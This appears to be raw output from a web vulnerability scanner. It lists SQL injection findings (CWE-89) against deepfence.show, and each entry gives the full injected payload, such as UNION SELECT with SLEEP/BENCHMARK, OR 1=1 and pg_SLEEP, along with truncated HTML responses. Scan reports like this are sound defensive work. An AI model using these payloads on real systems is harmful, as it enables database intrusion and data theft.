href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1666\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1667\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1668\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1669\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1670\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1671\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1672\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AS INJECTX WHERE 1=1 AND 1=0\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1673\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1674\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(50000000,MD5(1))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1675\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1676\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or pg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1677\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1678\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1679\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 